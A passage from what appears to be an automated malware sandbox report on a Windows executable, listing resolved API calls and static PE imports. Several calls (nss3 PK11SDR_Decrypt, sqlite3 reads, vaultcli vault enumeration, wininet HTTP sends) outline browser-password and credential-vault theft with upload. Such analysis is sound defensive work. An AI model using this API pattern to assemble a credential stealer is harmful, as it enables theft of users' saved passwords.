  2843. "advapi32.dll.GetUserNameW",
  2844. "advapi32.dll.RegCreateKeyExW",
  2845. "advapi32.dll.AllocateAndInitializeSid",
  2846. "advapi32.dll.LookupAccountSidA",
  2847. "advapi32.dll.CreateProcessAsUserW",
  2848. "advapi32.dll.CheckTokenMembership",
  2849. "advapi32.dll.RegOpenKeyW",
  2850. "advapi32.dll.RegEnumKeyW",
  2851. "advapi32.dll.CryptAcquireContextA",
  2852. "advapi32.dll.CryptCreateHash",
  2853. "advapi32.dll.CryptHashData",
  2854. "advapi32.dll.CryptGetHashParam",
  2855. "advapi32.dll.CryptDestroyHash",
  2856. "advapi32.dll.CryptReleaseContext",
  2857. "user32.dll.EnumDisplayDevicesW",
  2858. "user32.dll.wvsprintfA",
  2859. "user32.dll.GetKeyboardLayoutList",
  2860. "shell32.dll.ShellExecuteExW",
  2861. "ntdll.dll.RtlComputeCrc32",
  2862. "sechost.dll.LookupAccountSidLocalA",
  2863. "wininet.dll.InternetOpenA",
  2864. "wininet.dll.InternetConnectA",
  2865. "wininet.dll.HttpOpenRequestA",
  2866. "wininet.dll.HttpAddRequestHeadersA",
  2867. "wininet.dll.HttpSendRequestA",
  2868. "wininet.dll.InternetReadFile",
  2869. "wininet.dll.InternetCloseHandle",
  2870. "wininet.dll.InternetCrackUrlA",
  2871. "wininet.dll.InternetSetOptionA",
  2872. "rasapi32.dll.RasConnectionNotificationW",
  2873. "sechost.dll.OpenServiceA",
  2874. "sechost.dll.NotifyServiceStatusChangeA",
  2875. "cryptbase.dll.SystemFunction036",
  2876. "nss3.dll.sqlite3_open",
  2877. "nss3.dll.sqlite3_close",
  2878. "nss3.dll.sqlite3_prepare_v2",
  2879. "nss3.dll.sqlite3_step",
  2880. "nss3.dll.sqlite3_column_text",
  2881. "nss3.dll.sqlite3_column_bytes",
  2882. "nss3.dll.sqlite3_finalize",
  2883. "nss3.dll.NSS_Init",
  2884. "nss3.dll.PK11_GetInternalKeySlot",
  2885. "nss3.dll.PK11_Authenticate",
  2886. "nss3.dll.PK11SDR_Decrypt",
  2887. "nss3.dll.NSS_Shutdown",
  2888. "nss3.dll.PK11_FreeSlot",
  2889. "kernel32.dll.InitializeCriticalSectionEx",
  2890. "ole32.dll.CLSIDFromString",
  2891. "vaultcli.dll.VaultOpenVault",
  2892. "vaultcli.dll.VaultEnumerateItems",
  2893. "vaultcli.dll.VaultGetItem",
  2894. "uxtheme.dll.ThemeInitApiHook",
  2895. "user32.dll.IsProcessDPIAware",
  2896. "mlang.dll.#112",
  2897. "wininet.dll.FindFirstUrlCacheEntryA",
  2898. "urlmon.dll.CreateUri",
  2899. "wininet.dll.FindNextUrlCacheEntryA",
  2900. "urlmon.dll.CreateIUriBuilder",
  2901. "urlmon.dll.IntlPercentEncodeNormalize",
  2902. "wininet.dll.FindCloseUrlCache",
  2903. "rpcrt4.dll.RpcStringBindingComposeW",
  2904. "rpcrt4.dll.RpcBindingFromStringBindingW",
  2905. "rpcrt4.dll.NdrClientCall2",
  2906. "cryptbase.dll.SystemFunction041",
  2907. "rpcrt4.dll.RpcStringFreeW",
  2908. "rpcrt4.dll.RpcBindingFree",
  2909. "kernel32.dll.IsProcessorFeaturePresent",
  2910. "user32.dll.GetWindowInfo",
  2911. "user32.dll.GetAncestor",
  2912. "user32.dll.EnumDisplayDevicesA",
  2913. "gdi32.dll.ExtTextOutW",
  2914. "kernel32.dll.FlsGetValue",
  2915. "windowscodecs.dll.DllGetClassObject",
  2916. "kernel32.dll.WerRegisterMemoryBlock",
  2917. "oleaut32.dll.#8",
  2918. "oleaut32.dll.#9",
  2919. "oleaut32.dll.#10",
  2920. "kernel32.dll.IsWow64Process",
  2921. "kernel32.dll.FlsFree",
  2922. "sechost.dll.LookupAccountNameLocalW",
  2923. "advapi32.dll.LookupAccountSidW",
  2924. "sechost.dll.LookupAccountSidLocalW",
  2925. "ole32.dll.CoInitializeSecurity",
  2926. "ole32.dll.CoCreateInstance",
  2927. "kernel32.dll.SortGetHandle",
  2928. "kernel32.dll.SortCloseHandle",
  2929. "w32time.dll.SvchostEntry_W32Time",
  2930. "w32time.dll.SvchostPushServiceGlobals",
  2931. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
  2932. "ws2_32.dll.#115",
  2933. "ws2_32.dll.WSASocketW",
  2934. "ws2_32.dll.WSAIoctl",
  2935. "ws2_32.dll.#111",
  2936. "userenv.dll.RegisterGPNotification",
  2937. "gpapi.dll.RegisterGPNotificationInternal",
  2938. "sechost.dll.OpenSCManagerW",
  2939. "sechost.dll.OpenServiceW",
  2940. "sechost.dll.CloseServiceHandle",
  2941. "sechost.dll.QueryServiceConfigW",
  2942. "dsrole.dll.DsRoleGetPrimaryDomainInformation",
  2943. "dsrole.dll.DsRoleFreeMemory",
  2944. "sspicli.dll.LsaRegisterPolicyChangeNotification",
  2945. "w32time.dll.TimeProvClose",
  2946. "w32time.dll.TimeProvCommand",
  2947. "w32time.dll.TimeProvOpen",
  2948. "ws2_32.dll.getaddrinfo",
  2949. "ws2_32.dll.freeaddrinfo",
  2950. "ws2_32.dll.#23",
  2951. "ws2_32.dll.#21",
  2952. "ws2_32.dll.#2",
  2953. "ws2_32.dll.WSAEventSelect",
  2954. "vmictimeprovider.dll.TimeProvClose",
  2955. "ws2_32.dll.GetAddrInfoW",
  2956. "vmictimeprovider.dll.TimeProvCommand",
  2957. "vmictimeprovider.dll.TimeProvOpen",
  2958. "advapi32.dll.EventRegister",
  2959. "advapi32.dll.EventEnabled",
  2960. "advapi32.dll.EventWrite",
  2961. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  2962. "ws2_32.dll.FreeAddrInfoW",
  2963. "ws2_32.dll.WSAAddressToStringW",
  2964. "ws2_32.dll.#3",
  2965. "ws2_32.dll.#116",
  2966. "advapi32.dll.EventUnregister",
  2967. "sspicli.dll.LsaUnregisterPolicyChangeNotification",
  2968. "userenv.dll.UnregisterGPNotification",
  2969. "gpapi.dll.UnregisterGPNotificationInternal",
  2970. "wersvc.dll.ServiceMain",
  2971. "wersvc.dll.SvchostPushServiceGlobals",
  2972. "advapi32.dll.RegGetValueW",
  2973. "faultrep.dll.WerpInitiateCrashReporting",
  2974. "wer.dll.WerpCreateMachineStore",
  2975. "shell32.dll.SHGetFolderPathEx",
  2976. "ole32.dll.StringFromGUID2",
  2977. "profapi.dll.#104",
  2978. "userenv.dll.CreateEnvironmentBlock",
  2979. "sechost.dll.ConvertSidToStringSidW",
  2980. "sspicli.dll.GetUserNameExW",
  2981. "userenv.dll.DestroyEnvironmentBlock",
  2982. "wer.dll.WerpSvcReportFromMachineQueue",
  2983. "advapi32.dll.OpenProcessToken",
  2984. "advapi32.dll.DuplicateToken",
  2985. "advapi32.dll.FreeSid",
  2986. "wtsapi32.dll.WTSQueryUserToken",
  2987. "winsta.dll.WinStationQueryInformationW",
  2988. "advapi32.dll.CreateWellKnownSid",
  2989. "rpcrt4.dll.RpcBindingSetAuthInfoExW",
  2990. "rpcrt4.dll.NdrClientCall3",
  2991. "advapi32.dll.ImpersonateLoggedOnUser",
  2992. "advapi32.dll.RevertToSelf",
  2993. "imm32.dll.ImmDisableIME",
  2994. "psapi.dll.GetModuleFileNameExW",
  2995. "version.dll.GetFileVersionInfoSizeW",
  2996. "version.dll.GetFileVersionInfoW",
  2997. "version.dll.VerQueryValueW",
  2998. "wer.dll.WerpCreateIntegratorReportId",
  2999. "wer.dll.WerReportCreate",
  3000. "wer.dll.WerpSetIntegratorReportId",
  3001. "wer.dll.WerReportSetParameter",
  3002. "dbgeng.dll.DebugCreate",
  3003. "ntdll.dll.CsrGetProcessId",
  3004. "ntdll.dll.DbgBreakPoint",
  3005. "ntdll.dll.DbgPrint",
  3006. "ntdll.dll.DbgPrompt",
  3007. "ntdll.dll.DbgUiConvertStateChangeStructure",
  3008. "ntdll.dll.DbgUiGetThreadDebugObject",
  3009. "ntdll.dll.DbgUiIssueRemoteBreakin",
  3010. "ntdll.dll.DbgUiSetThreadDebugObject",
  3011. "ntdll.dll.NtAllocateVirtualMemory",
  3012. "ntdll.dll.NtClose",
  3013. "ntdll.dll.NtCreateDebugObject",
  3014. "ntdll.dll.NtCreateFile",
  3015. "ntdll.dll.NtDebugActiveProcess",
  3016. "ntdll.dll.NtDebugContinue",
  3017. "ntdll.dll.NtFreeVirtualMemory",
  3018. "ntdll.dll.NtOpenProcess",
  3019. "ntdll.dll.NtOpenThread",
  3020. "ntdll.dll.NtQueryInformationProcess",
  3021. "ntdll.dll.NtQueryInformationThread",
  3022. "ntdll.dll.NtQueryMutant",
  3023. "ntdll.dll.NtQueryObject",
  3024. "ntdll.dll.NtQuerySystemInformation",
  3025. "ntdll.dll.NtRemoveProcessDebug",
  3026. "ntdll.dll.NtResumeThread",
  3027. "ntdll.dll.NtSetInformationDebugObject",
  3028. "ntdll.dll.NtSetInformationProcess",
  3029. "ntdll.dll.NtSystemDebugControl",
  3030. "ntdll.dll.NtWaitForDebugEvent",
  3031. "ntdll.dll.RtlAnsiStringToUnicodeString",
  3032. "ntdll.dll.RtlCreateProcessParameters",
  3033. "ntdll.dll.RtlCreateUserProcess",
  3034. "ntdll.dll.RtlDestroyProcessParameters",
  3035. "ntdll.dll.RtlDosPathNameToNtPathName_U",
  3036. "ntdll.dll.RtlFindMessage",
  3037. "ntdll.dll.RtlFreeHeap",
  3038. "ntdll.dll.RtlFreeUnicodeString",
  3039. "ntdll.dll.RtlGetFunctionTableListHead",
  3040. "ntdll.dll.RtlGetUnloadEventTrace",
  3041. "ntdll.dll.RtlGetUnloadEventTraceEx",
  3042. "ntdll.dll.RtlInitAnsiString",
  3043. "ntdll.dll.RtlInitUnicodeString",
  3044. "ntdll.dll.RtlTryEnterCriticalSection",
  3045. "ntdll.dll.RtlUnicodeStringToAnsiString",
  3046. "ntdll.dll.NtOpenProcessToken",
  3047. "ntdll.dll.NtOpenThreadToken",
  3048. "ntdll.dll.NtQueryInformationToken",
  3049. "kernel32.dll.CloseProfileUserMapping",
  3050. "kernel32.dll.DebugActiveProcessStop",
  3051. "kernel32.dll.DebugBreak",
  3052. "kernel32.dll.DebugBreakProcess",
  3053. "kernel32.dll.DebugSetProcessKillOnExit",
  3054. "kernel32.dll.Module32First",
  3055. "kernel32.dll.Module32FirstW",
  3056. "kernel32.dll.Module32Next",
  3057. "kernel32.dll.Module32NextW",
  3058. "kernel32.dll.OpenThread",
  3059. "kernel32.dll.Process32First",
  3060. "kernel32.dll.Process32Next",
  3061. "kernel32.dll.ProcessIdToSessionId",
  3062. "kernel32.dll.SetProcessShutdownParameters",
  3063. "kernel32.dll.Thread32First",
  3064. "kernel32.dll.Thread32Next",
  3065. "kernel32.dll.DuplicateHandle",
  3066. "kernel32.dll.Wow64GetThreadSelectorEntry",
  3067. "advapi32.dll.CloseServiceHandle",
  3068. "advapi32.dll.ControlService",
  3069. "advapi32.dll.CreateServiceA",
  3070. "advapi32.dll.CreateServiceW",
  3071. "advapi32.dll.DeleteService",
  3072. "advapi32.dll.EnumServicesStatusExA",
  3073. "advapi32.dll.EnumServicesStatusExW",
  3074. "advapi32.dll.GetEventLogInformation",
  3075. "advapi32.dll.GetTokenInformation",
  3076. "advapi32.dll.OpenSCManagerA",
  3077. "advapi32.dll.OpenSCManagerW",
  3078. "advapi32.dll.OpenServiceA",
  3079. "advapi32.dll.OpenServiceW",
  3080. "advapi32.dll.StartServiceA",
  3081. "advapi32.dll.StartServiceW",
  3082. "advapi32.dll.GetSidSubAuthority",
  3083. "advapi32.dll.GetSidSubAuthorityCount",
  3084. "version.dll.GetFileVersionInfoSizeExW",
  3085. "version.dll.GetFileVersionInfoExW",
  3086. "dbghelp.dll.WinDbgExtensionDllInit",
  3087. "dbghelp.dll.ExtensionApiVersion",
  3088. "wer.dll.WerpSetDynamicParameter",
  3089. "wer.dll.WerReportAddDump",
  3090. "wer.dll.WerpSetCallBack",
  3091. "wer.dll.WerReportSetUIOption",
  3092. "wer.dll.WerpAddRegisteredDataToReport",
  3093. "wer.dll.WerReportSubmit",
  3094. "user32.dll.LoadStringW",
  3095. "advapi32.dll.RegSetValueExW",
  3096. "sensapi.dll.IsNetworkAlive",
  3097. "user32.dll.CharUpperW",
  3098. "wer.dll.WerpAddAppCompatData",
  3099. "apphelp.dll.SdbGetFileAttributes",
  3100. "apphelp.dll.SdbFormatAttribute",
  3101. "apphelp.dll.SdbFreeFileAttributes",
  3102. "cryptsp.dll.CryptAcquireContextW",
  3103. "cryptsp.dll.CryptCreateHash",
  3104. "cryptsp.dll.CryptHashData",
  3105. "cryptsp.dll.CryptGetHashParam",
  3106. "cryptsp.dll.CryptDestroyHash",
  3107. "cryptsp.dll.CryptReleaseContext",
  3108. "dbghelp.dll.MiniDumpWriteDump",
  3109. "kernel32.dll.GetLongPathNameA",
  3110. "kernel32.dll.GetLongPathNameW",
  3111. "kernel32.dll.GetProcessTimes",
  3112. "advapi32.dll.RegOpenKeyExA",
  3113. "powrprof.dll.CallNtPowerInformation",
  3114. "psapi.dll.EnumProcessModules",
  3115. "version.dll.GetFileVersionInfoSizeA",
  3116. "version.dll.GetFileVersionInfoA",
  3117. "version.dll.VerQueryValueA",
  3118. "verifier.dll.VerifierEnumerateResource",
  3119. "ntdll.dll.NtSuspendProcess",
  3120. "ntdll.dll.NtResumeProcess",
  3121. "advapi32.dll.QueryTraceW",
  3122. "advapi32.dll.IsValidSid",
  3123. "advapi32.dll.GetLengthSid",
  3124. "advapi32.dll.CopySid",
  3125. "advapi32.dll.InitializeAcl",
  3126. "advapi32.dll.AddAccessAllowedAceEx",
  3127. "advapi32.dll.InitializeSecurityDescriptor",
  3128. "advapi32.dll.SetSecurityDescriptorDacl",
  3129. "advapi32.dll.RegisterEventSourceW",
  3130. "advapi32.dll.ReportEventW",
  3131. "advapi32.dll.DeregisterEventSource",
  3132. "wer.dll.WerpGetStoreLocation",
  3133. "wer.dll.WerpGetStoreType",
  3134. "wer.dll.WerReportCloseHandle",
  3135. "user32.dll.MsgWaitForMultipleObjects",
  3136. "wer.dll.WerpFreeString",
  3137. "user32.dll.GetProcessWindowStation",
  3138. "user32.dll.GetThreadDesktop",
  3139. "user32.dll.GetUserObjectInformationW",
  3140. "werui.dll.WerUICreate",
  3141. "werui.dll.WerUIStart",
  3142. "werui.dll.WerUITerminate",
  3143. "werui.dll.WerUIDelete"
  3144. ]
  3145.  
  3146. [*] Static Analysis: {
  3147. "pe": {
  3148. "peid_signatures": null,
  3149. "imports": [
  3150. {
  3151. "imports": [
  3152. {
  3153. "name": "DeleteCriticalSection",
  3154. "address": "0x46f168"
  3155. },
  3156. {
  3157. "name": "LeaveCriticalSection",
  3158. "address": "0x46f16c"
  3159. },
  3160. {
  3161. "name": "EnterCriticalSection",
  3162. "address": "0x46f170"
  3163. },
  3164. {
  3165. "name": "InitializeCriticalSection",
  3166. "address": "0x46f174"
  3167. },
  3168. {
  3169. "name": "VirtualFree",
  3170. "address": "0x46f178"
  3171. },
  3172. {
  3173. "name": "VirtualAlloc",
  3174. "address": "0x46f17c"
  3175. },
  3176. {
  3177. "name": "LocalFree",
  3178. "address": "0x46f180"
  3179. },
  3180. {
  3181. "name": "LocalAlloc",
  3182. "address": "0x46f184"
  3183. },
  3184. {
  3185. "name": "GetVersion",
  3186. "address": "0x46f188"
  3187. },
  3188. {
  3189. "name": "GetCurrentThreadId",
  3190. "address": "0x46f18c"
  3191. },
  3192. {
  3193. "name": "InterlockedDecrement",
  3194. "address": "0x46f190"
  3195. },
  3196. {
  3197. "name": "InterlockedIncrement",
  3198. "address": "0x46f194"
  3199. },
  3200. {
  3201. "name": "VirtualQuery",
  3202. "address": "0x46f198"
  3203. },
  3204. {
  3205. "name": "WideCharToMultiByte",
  3206. "address": "0x46f19c"
  3207. },
  3208. {
  3209. "name": "MultiByteToWideChar",
  3210. "address": "0x46f1a0"
  3211. },
  3212. {
  3213. "name": "lstrlenA",
  3214. "address": "0x46f1a4"
  3215. },
  3216. {
  3217. "name": "lstrcpynA",
  3218. "address": "0x46f1a8"
  3219. },
  3220. {
  3221. "name": "LoadLibraryExA",
  3222. "address": "0x46f1ac"
  3223. },
  3224. {
  3225. "name": "GetThreadLocale",
  3226. "address": "0x46f1b0"
  3227. },
  3228. {
  3229. "name": "GetStartupInfoA",
  3230. "address": "0x46f1b4"
  3231. },
  3232. {
  3233. "name": "GetProcAddress",
  3234. "address": "0x46f1b8"
  3235. },
  3236. {
  3237. "name": "GetModuleHandleA",
  3238. "address": "0x46f1bc"
  3239. },
  3240. {
  3241. "name": "GetModuleFileNameA",
  3242. "address": "0x46f1c0"
  3243. },
  3244. {
  3245. "name": "GetLocaleInfoA",
  3246. "address": "0x46f1c4"
  3247. },
  3248. {
  3249. "name": "GetCommandLineA",
  3250. "address": "0x46f1c8"
  3251. },
  3252. {
  3253. "name": "FreeLibrary",
  3254. "address": "0x46f1cc"
  3255. },
  3256. {
  3257. "name": "FindFirstFileA",
  3258. "address": "0x46f1d0"
  3259. },
  3260. {
  3261. "name": "FindClose",
  3262. "address": "0x46f1d4"
  3263. },
  3264. {
  3265. "name": "ExitProcess",
  3266. "address": "0x46f1d8"
  3267. },
  3268. {
  3269. "name": "WriteFile",
  3270. "address": "0x46f1dc"
  3271. },
  3272. {
  3273. "name": "UnhandledExceptionFilter",
  3274. "address": "0x46f1e0"
  3275. },
  3276. {
  3277. "name": "RtlUnwind",
  3278. "address": "0x46f1e4"
  3279. },
  3280. {
  3281. "name": "RaiseException",
  3282. "address": "0x46f1e8"
  3283. },
  3284. {
  3285. "name": "GetStdHandle",
  3286. "address": "0x46f1ec"
  3287. }
  3288. ],
  3289. "dll": "kernel32.dll"
  3290. },
  3291. {
  3292. "imports": [
  3293. {
  3294. "name": "GetKeyboardType",
  3295. "address": "0x46f1f4"
  3296. },
  3297. {
  3298. "name": "LoadStringA",
  3299. "address": "0x46f1f8"
  3300. },
  3301. {
  3302. "name": "MessageBoxA",
  3303. "address": "0x46f1fc"
  3304. },
  3305. {
  3306. "name": "CharNextA",
  3307. "address": "0x46f200"
  3308. }
  3309. ],
  3310. "dll": "user32.dll"
  3311. },
  3312. {
  3313. "imports": [
  3314. {
  3315. "name": "RegQueryValueExA",
  3316. "address": "0x46f208"
  3317. },
  3318. {
  3319. "name": "RegOpenKeyExA",
  3320. "address": "0x46f20c"
  3321. },
  3322. {
  3323. "name": "RegCloseKey",
  3324. "address": "0x46f210"
  3325. }
  3326. ],
  3327. "dll": "advapi32.dll"
  3328. },
  3329. {
  3330. "imports": [
  3331. {
  3332. "name": "SysFreeString",
  3333. "address": "0x46f218"
  3334. },
  3335. {
  3336. "name": "SysReAllocStringLen",
  3337. "address": "0x46f21c"
  3338. },
  3339. {
  3340. "name": "SysAllocStringLen",
  3341. "address": "0x46f220"
  3342. }
  3343. ],
  3344. "dll": "oleaut32.dll"
  3345. },
  3346. {
  3347. "imports": [
  3348. {
  3349. "name": "TlsSetValue",
  3350. "address": "0x46f228"
  3351. },
  3352. {
  3353. "name": "TlsGetValue",
  3354. "address": "0x46f22c"
  3355. },
  3356. {
  3357. "name": "LocalAlloc",
  3358. "address": "0x46f230"
  3359. },
  3360. {
  3361. "name": "GetModuleHandleA",
  3362. "address": "0x46f234"
  3363. }
  3364. ],
  3365. "dll": "kernel32.dll"
  3366. },
  3367. {
  3368. "imports": [
  3369. {
  3370. "name": "RegQueryValueExA",
  3371. "address": "0x46f23c"
  3372. },
  3373. {
  3374. "name": "RegOpenKeyExA",
  3375. "address": "0x46f240"
  3376. },
  3377. {
  3378. "name": "RegCloseKey",
  3379. "address": "0x46f244"
  3380. }
  3381. ],
  3382. "dll": "advapi32.dll"
  3383. },
  3384. {
  3385. "imports": [
  3386. {
  3387. "name": "lstrcpyA",
  3388. "address": "0x46f24c"
  3389. },
  3390. {
  3391. "name": "WriteFile",
  3392. "address": "0x46f250"
  3393. },
  3394. {
  3395. "name": "WaitForSingleObject",
  3396. "address": "0x46f254"
  3397. },
  3398. {
  3399. "name": "VirtualQuery",
  3400. "address": "0x46f258"
  3401. },
  3402. {
  3403. "name": "VirtualAlloc",
  3404. "address": "0x46f25c"
  3405. },
  3406. {
  3407. "name": "Sleep",
  3408. "address": "0x46f260"
  3409. },
  3410. {
  3411. "name": "SizeofResource",
  3412. "address": "0x46f264"
  3413. },
  3414. {
  3415. "name": "SetThreadLocale",
  3416. "address": "0x46f268"
  3417. },
  3418. {
  3419. "name": "SetFilePointer",
  3420. "address": "0x46f26c"
  3421. },
  3422. {
  3423. "name": "SetEvent",
  3424. "address": "0x46f270"
  3425. },
  3426. {
  3427. "name": "SetErrorMode",
  3428. "address": "0x46f274"
  3429. },
  3430. {
  3431. "name": "SetEndOfFile",
  3432. "address": "0x46f278"
  3433. },
  3434. {
  3435. "name": "ResetEvent",
  3436. "address": "0x46f27c"
  3437. },
  3438. {
  3439. "name": "ReadFile",
  3440. "address": "0x46f280"
  3441. },
  3442. {
  3443. "name": "MultiByteToWideChar",
  3444. "address": "0x46f284"
  3445. },
  3446. {
  3447. "name": "MulDiv",
  3448. "address": "0x46f288"
  3449. },
  3450. {
  3451. "name": "LockResource",
  3452. "address": "0x46f28c"
  3453. },
  3454. {
  3455. "name": "LoadResource",
  3456. "address": "0x46f290"
  3457. },
  3458. {
  3459. "name": "LoadLibraryA",
  3460. "address": "0x46f294"
  3461. },
  3462. {
  3463. "name": "LeaveCriticalSection",
  3464. "address": "0x46f298"
  3465. },
  3466. {
  3467. "name": "InitializeCriticalSection",
  3468. "address": "0x46f29c"
  3469. },
  3470. {
  3471. "name": "GlobalUnlock",
  3472. "address": "0x46f2a0"
  3473. },
  3474. {
  3475. "name": "GlobalSize",
  3476. "address": "0x46f2a4"
  3477. },
  3478. {
  3479. "name": "GlobalReAlloc",
  3480. "address": "0x46f2a8"
  3481. },
  3482. {
  3483. "name": "GlobalHandle",
  3484. "address": "0x46f2ac"
  3485. },
  3486. {
  3487. "name": "GlobalLock",
  3488. "address": "0x46f2b0"
  3489. },
  3490. {
  3491. "name": "GlobalFree",
  3492. "address": "0x46f2b4"
  3493. },
  3494. {
  3495. "name": "GlobalFindAtomA",
  3496. "address": "0x46f2b8"
  3497. },
  3498. {
  3499. "name": "GlobalDeleteAtom",
  3500. "address": "0x46f2bc"
  3501. },
  3502. {
  3503. "name": "GlobalAlloc",
  3504. "address": "0x46f2c0"
  3505. },
  3506. {
  3507. "name": "GlobalAddAtomA",
  3508. "address": "0x46f2c4"
  3509. },
  3510. {
  3511. "name": "GetVersionExA",
  3512. "address": "0x46f2c8"
  3513. },
  3514. {
  3515. "name": "GetVersion",
  3516. "address": "0x46f2cc"
  3517. },
  3518. {
  3519. "name": "GetUserDefaultLCID",
  3520. "address": "0x46f2d0"
  3521. },
  3522. {
  3523. "name": "GetTickCount",
  3524. "address": "0x46f2d4"
  3525. },
  3526. {
  3527. "name": "GetThreadLocale",
  3528. "address": "0x46f2d8"
  3529. },
  3530. {
  3531. "name": "GetSystemInfo",
  3532. "address": "0x46f2dc"
  3533. },
  3534. {
  3535. "name": "GetStringTypeExA",
  3536. "address": "0x46f2e0"
  3537. },
  3538. {
  3539. "name": "GetStdHandle",
  3540. "address": "0x46f2e4"
  3541. },
  3542. {
  3543. "name": "GetProfileStringA",
  3544. "address": "0x46f2e8"
  3545. },
  3546. {
  3547. "name": "GetProcAddress",
  3548. "address": "0x46f2ec"
  3549. },
  3550. {
  3551. "name": "GetModuleHandleA",
  3552. "address": "0x46f2f0"
  3553. },
  3554. {
  3555. "name": "GetModuleFileNameA",
  3556. "address": "0x46f2f4"
  3557. },
  3558. {
  3559. "name": "GetLocaleInfoA",
  3560. "address": "0x46f2f8"
  3561. },
  3562. {
  3563. "name": "GetLocalTime",
  3564. "address": "0x46f2fc"
  3565. },
  3566. {
  3567. "name": "GetLastError",
  3568. "address": "0x46f300"
  3569. },
  3570. {
  3571. "name": "GetFullPathNameA",
  3572. "address": "0x46f304"
  3573. },
  3574. {
  3575. "name": "GetDiskFreeSpaceA",
  3576. "address": "0x46f308"
  3577. },
  3578. {
  3579. "name": "GetDateFormatA",
  3580. "address": "0x46f30c"
  3581. },
  3582. {
  3583. "name": "GetCurrentThreadId",
  3584. "address": "0x46f310"
  3585. },
  3586. {
  3587. "name": "GetCurrentProcessId",
  3588. "address": "0x46f314"
  3589. },
  3590. {
  3591. "name": "GetComputerNameA",
  3592. "address": "0x46f318"
  3593. },
  3594. {
  3595. "name": "GetCPInfo",
  3596. "address": "0x46f31c"
  3597. },
  3598. {
  3599. "name": "GetACP",
  3600. "address": "0x46f320"
  3601. },
  3602. {
  3603. "name": "FreeResource",
  3604. "address": "0x46f324"
  3605. },
  3606. {
  3607. "name": "InterlockedExchange",
  3608. "address": "0x46f328"
  3609. },
  3610. {
  3611. "name": "FreeLibrary",
  3612. "address": "0x46f32c"
  3613. },
  3614. {
  3615. "name": "FormatMessageA",
  3616. "address": "0x46f330"
  3617. },
  3618. {
  3619. "name": "FindResourceA",
  3620. "address": "0x46f334"
  3621. },
  3622. {
  3623. "name": "EnumCalendarInfoA",
  3624. "address": "0x46f338"
  3625. },
  3626. {
  3627. "name": "EnterCriticalSection",
  3628. "address": "0x46f33c"
  3629. },
  3630. {
  3631. "name": "DeleteCriticalSection",
  3632. "address": "0x46f340"
  3633. },
  3634. {
  3635. "name": "CreateThread",
  3636. "address": "0x46f344"
  3637. },
  3638. {
  3639. "name": "CreateFileA",
  3640. "address": "0x46f348"
  3641. },
  3642. {
  3643. "name": "CreateEventA",
  3644. "address": "0x46f34c"
  3645. },
  3646. {
  3647. "name": "CompareStringA",
  3648. "address": "0x46f350"
  3649. },
  3650. {
  3651. "name": "CloseHandle",
  3652. "address": "0x46f354"
  3653. }
  3654. ],
  3655. "dll": "kernel32.dll"
  3656. },
  3657. {
  3658. "imports": [
  3659. {
  3660. "name": "VerQueryValueA",
  3661. "address": "0x46f35c"
  3662. },
  3663. {
  3664. "name": "GetFileVersionInfoSizeA",
  3665. "address": "0x46f360"
  3666. },
  3667. {
  3668. "name": "GetFileVersionInfoA",
  3669. "address": "0x46f364"
  3670. }
  3671. ],
  3672. "dll": "version.dll"
  3673. },
  3674. {
  3675. "imports": [
  3676. {
  3677. "name": "UnrealizeObject",
  3678. "address": "0x46f36c"
  3679. },
  3680. {
  3681. "name": "StretchBlt",
  3682. "address": "0x46f370"
  3683. },
  3684. {
  3685. "name": "SetWindowOrgEx",
  3686. "address": "0x46f374"
  3687. },
  3688. {
  3689. "name": "SetWinMetaFileBits",
  3690. "address": "0x46f378"
  3691. },
  3692. {
  3693. "name": "SetViewportOrgEx",
  3694. "address": "0x46f37c"
  3695. },
  3696. {
  3697. "name": "SetTextColor",
  3698. "address": "0x46f380"
  3699. },
  3700. {
  3701. "name": "SetStretchBltMode",
  3702. "address": "0x46f384"
  3703. },
  3704. {
  3705. "name": "SetROP2",
  3706. "address": "0x46f388"
  3707. },
  3708. {
  3709. "name": "SetPixel",
  3710. "address": "0x46f38c"
  3711. },
  3712. {
  3713. "name": "SetMapMode",
  3714. "address": "0x46f390"
  3715. },
  3716. {
  3717. "name": "SetEnhMetaFileBits",
  3718. "address": "0x46f394"
  3719. },
  3720. {
  3721. "name": "SetDIBColorTable",
  3722. "address": "0x46f398"
  3723. },
  3724. {
  3725. "name": "SetBrushOrgEx",
  3726. "address": "0x46f39c"
  3727. },
  3728. {
  3729. "name": "SetBkMode",
  3730. "address": "0x46f3a0"
  3731. },
  3732. {
  3733. "name": "SetBkColor",
  3734. "address": "0x46f3a4"
  3735. },
  3736. {
  3737. "name": "SelectPalette",
  3738. "address": "0x46f3a8"
  3739. },
  3740. {
  3741. "name": "SelectObject",
  3742. "address": "0x46f3ac"
  3743. },
  3744. {
  3745. "name": "SelectClipRgn",
  3746. "address": "0x46f3b0"
  3747. },
  3748. {
  3749. "name": "ScaleWindowExtEx",
  3750. "address": "0x46f3b4"
  3751. },
  3752. {
  3753. "name": "SaveDC",
  3754. "address": "0x46f3b8"
  3755. },
  3756. {
  3757. "name": "RestoreDC",
  3758. "address": "0x46f3bc"
  3759. },
  3760. {
  3761. "name": "RectVisible",
  3762. "address": "0x46f3c0"
  3763. },
  3764. {
  3765. "name": "RealizePalette",
  3766. "address": "0x46f3c4"
  3767. },
  3768. {
  3769. "name": "PlayEnhMetaFile",
  3770. "address": "0x46f3c8"
  3771. },
  3772. {
  3773. "name": "PathToRegion",
  3774. "address": "0x46f3cc"
  3775. },
  3776. {
  3777. "name": "PatBlt",
  3778. "address": "0x46f3d0"
  3779. },
  3780. {
  3781. "name": "MoveToEx",
  3782. "address": "0x46f3d4"
  3783. },
  3784. {
  3785. "name": "MaskBlt",
  3786. "address": "0x46f3d8"
  3787. },
  3788. {
  3789. "name": "LineTo",
  3790. "address": "0x46f3dc"
  3791. },
  3792. {
  3793. "name": "LPtoDP",
  3794. "address": "0x46f3e0"
  3795. },
  3796. {
  3797. "name": "IntersectClipRect",
  3798. "address": "0x46f3e4"
  3799. },
  3800. {
  3801. "name": "GetWindowOrgEx",
  3802. "address": "0x46f3e8"
  3803. },
  3804. {
  3805. "name": "GetWinMetaFileBits",
  3806. "address": "0x46f3ec"
  3807. },
  3808. {
  3809. "name": "GetTextMetricsA",
  3810. "address": "0x46f3f0"
  3811. },
  3812. {
  3813. "name": "GetTextExtentPoint32A",
  3814. "address": "0x46f3f4"
  3815. },
  3816. {
  3817. "name": "GetSystemPaletteEntries",
  3818. "address": "0x46f3f8"
  3819. },
  3820. {
  3821. "name": "GetStockObject",
  3822. "address": "0x46f3fc"
  3823. },
  3824. {
  3825. "name": "GetPixel",
  3826. "address": "0x46f400"
  3827. },
  3828. {
